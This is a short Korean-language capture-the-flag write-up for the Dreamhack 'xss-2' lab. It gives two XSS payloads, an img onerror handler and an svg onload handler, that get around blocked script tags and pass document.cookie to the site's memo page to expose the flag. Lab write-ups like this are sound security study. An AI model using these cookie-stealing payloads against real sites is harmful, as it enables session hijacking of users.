[Dreamhack] xss-2

xss1 문제와 다 같지만 vuln페이지에서 스크립트 코드가 실행되지 않았다는 점이 달랐다.
스크립트 코드가 실행되지 않으니 이번에는 스크립트 코드가 아닌 다른 태그들을 이용하여 값을 입력해준다.

<img src= "" onerror = "location.href = '/memo?memo=' + document.cookie"/>
-> 이미지 태그를 이용해주었다. src에 경로을 ""으로 비워놨으니 onerror를 사용해 오류처리를 해주고 메모페이지 연결과 쿠키 출력은 xxs1과 똑같이 처리해주었다.


<svg onload=location.href='/memo?memo='+document.cookie>
->위와 코드가 같지만 svg 태그를 사용해주었다.

두 코드 모두 플래그를 출력해주는 코드이다!

플래그가 출력되는 걸 볼 수 있다.